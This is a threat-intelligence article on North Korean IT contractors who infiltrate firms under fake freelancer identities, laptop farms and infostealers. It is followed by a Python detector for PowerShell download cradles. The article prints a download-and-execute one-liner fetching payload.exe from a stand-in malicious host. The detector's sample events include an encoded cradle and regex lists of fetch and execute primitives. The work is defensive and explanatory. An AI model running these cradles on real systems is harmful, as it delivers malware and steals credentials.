Since at least 2018, a covert network of thousands of North Korean IT contractors has infiltrated global technology and infrastructure firms by masquerading as legitimate freelancers.
These operatives, operating under fabricated identities with AI-generated headshots, routinely use VPN services and “laptop farms” to disguise their geographic origins and circumvent platform verification checks.
Posing as developers, architects, and designers, they secure contracts on major freelancer platforms and enterprise portals, quietly funneling stolen credentials and sensitive data back to their handlers.
Initially identified through anomalies in VPN exit nodes and account-creation patterns, the scheme came into sharper focus in mid-2024, when infostealer logs began revealing connections from DPRK-linked VPN clients such as NetKey.
The malware deployed on compromised workstations exfiltrates session tokens, API keys, and SSH configurations, enabling persistent access to corporate networks without raising immediate suspicion.
Kela Cyber analysts noted that many of these infostealer infections leveraged common development tools—Python, Node.js, and JetBrains IDEs—alongside bespoke loaders disguised as benign executables like Call.exe and Time.exe (Kela Cyber, "Thousands of North Korean IT Workers Using VPNs and Laptop Farms to Bypass Origin Verification").
By blending into legitimate workflows, these operators not only evade detection but also expand the potential impact of their espionage activities.
In 2025 alone, compromised accounts surfaced on collaboration platforms such as Slack and GitLab, allowing attackers to deploy patches laced with backdoors.
The financial sector experienced surges in fraudulent wire transfers, while critical infrastructure projects saw unauthorized design modifications slip through code reviews—threats that underline the severity of this state-backed campaign.
Detection Evasion Tactics
A cornerstone of this operation is the use of geographically dispersed “laptop farms”—collections of remotely controlled machines that rotate through IP addresses to emulate authentic user behavior.
Once an operator has a foothold on a workstation, the first stage is typically a PowerShell one-liner that resembles a routine maintenance or update script, for example:
powershell -Command "(New-Object System.Net.WebClient).DownloadFile('http://malicious.server/payload.exe','payload.exe'); Start-Process '.\payload.exe'"
The one-liner fetches the infostealer payload over plain HTTP and launches it from the current directory; nothing in the command itself rotates IP addresses. The origin evasion comes from where it runs: because the machine sits in a laptop farm and its traffic exits through rotating residential addresses, the download and the subsequent beaconing look like local developer activity to origin-based security checks.
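The loader above is easy to spot in process-creation telemetry if you look for the download-and-execute pairing rather than for any single string. The script below is an added example written for this article, not code from the original page or from Kela Cyber; it scans constructed process-creation records (hypothetical hosts, users, paths and URLs) for that pairing, decodes -EncodedCommand payloads so the same rules apply to obfuscated cradles, and deliberately leaves a plain HTTPS download with no execution step unflagged.

```python
import base64
import re
from typing import Dict, List

# Constructed sample process-creation events (hypothetical hosts, users and
# URLs; not from the article or the Kela report). Fields mirror a typical
# EDR/Sysmon process-creation record: host, user, parent image, command line.
_ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')"
    .encode("utf-16le")).decode("ascii")

SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"host": "dev-ws-01", "user": "contractor7", "parent": r"C:\Windows\explorer.exe",
     "cmd": "powershell -Command \"(New-Object System.Net.WebClient).DownloadFile("
            "'http://malicious.server/payload.exe','payload.exe'); "
            "Start-Process '.\\payload.exe'\""},
    {"host": "dev-ws-02", "user": "alice",
     "parent": r"C:\Program Files\JetBrains\PyCharm\bin\pycharm64.exe",
     "cmd": r"powershell -NoProfile -File C:\scripts\build.ps1"},
    {"host": "dev-ws-03", "user": "contractor9", "parent": r"C:\Windows\System32\cmd.exe",
     "cmd": "powershell -w hidden -enc " + _ENCODED},
    {"host": "dev-ws-04", "user": "bob", "parent": r"C:\Windows\explorer.exe",
     "cmd": "powershell -Command \"Invoke-WebRequest -Uri "
            "https://artifacts.corp.example/tool.zip -OutFile tool.zip\""},
]

# Network-fetch primitives commonly used in PowerShell cradles.
DOWNLOAD = [r"\.DownloadFile\(", r"\.DownloadString\(", r"\.DownloadData\(",
            r"\bInvoke-WebRequest\b", r"\biwr\b", r"\bInvoke-RestMethod\b",
            r"\bStart-BitsTransfer\b", r"\bcurl\b", r"\bwget\b"]
# Primitives that run what was fetched.
EXECUTE = [r"\bStart-Process\b", r"\bInvoke-Expression\b", r"\bIEX\b",
           r"\bInvoke-Item\b", r"&\s*['\"]?\.\\", r"\brundll32\b", r"\bregsvr32\b"]
# Flags that hide the window or bypass script policy.
HIDE = [r"-w(?:indowstyle)?\s+hidden", r"-(?:ep|ExecutionPolicy)\s+bypass"]
ENCODED_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})",
                          re.IGNORECASE)
RELATIVE_EXEC = re.compile(r"Start-Process\s+['\"]?\.\\", re.IGNORECASE)
POWERSHELL = re.compile(r"\b(?:powershell|pwsh)(?:\.exe)?\b", re.IGNORECASE)


def decode_encoded_command(cmd: str) -> str:
    """Append the decoded -EncodedCommand payload (UTF-16LE base64) to the
    command line so the same patterns match it; return cmd unchanged otherwise."""
    m = ENCODED_FLAG.search(cmd)
    if not m:
        return cmd
    try:
        return cmd + " " + base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return cmd


def _any(patterns: List[str], text: str) -> bool:
    return any(re.search(p, text, re.IGNORECASE) for p in patterns)


def analyze(event: Dict[str, str]) -> List[str]:
    """Return the reasons this process-creation event looks like a download cradle."""
    cmd = event["cmd"]
    if not POWERSHELL.search(cmd):
        return []
    text = decode_encoded_command(cmd)
    reasons: List[str] = []
    downloads, executes = _any(DOWNLOAD, text), _any(EXECUTE, text)
    if downloads and executes:
        reasons.append("download-and-execute cradle")
    if downloads and re.search(r"\bhttp://", text, re.IGNORECASE):
        reasons.append("cleartext http download")
    if RELATIVE_EXEC.search(text):
        reasons.append("execution from relative path")
    if text != cmd:
        reasons.append("base64-encoded command")
    if _any(HIDE, text):
        reasons.append("hidden window or execution-policy bypass")
    return reasons


def triage(events: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Map host -> reasons for every event that tripped at least one rule."""
    findings: Dict[str, List[str]] = {}
    for event in events:
        reasons = analyze(event)
        if reasons:
            findings[event["host"]] = reasons
    return findings


if __name__ == "__main__":
    for host, reasons in triage(SAMPLE_EVENTS).items():
        print(host, "->", "; ".join(reasons))
```

Run against the constructed events, dev-ws-01 (the article's cradle) and dev-ws-03 (the same cradle hidden behind -enc) are flagged, while the PyCharm build script and the HTTPS artifact download are not. The rules are intentionally generic; in production you would pair them with the parent-process and user context already in the record, since a cradle launched from an IDE by a contractor account is a different conversation from one launched by a patching agent.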
In tandem, operators automate identity management with profile-isolating (anti-detect) browsers such as IxBrowser, keeping a separate browser fingerprint, cookie store, set of credentials, and multi-factor tokens for each persona so that no two fake identities share observable artifacts.
These layered tactics ensure that anomalous traffic blends seamlessly with genuine developer activity, complicating forensic analysis and prolonging dwell time.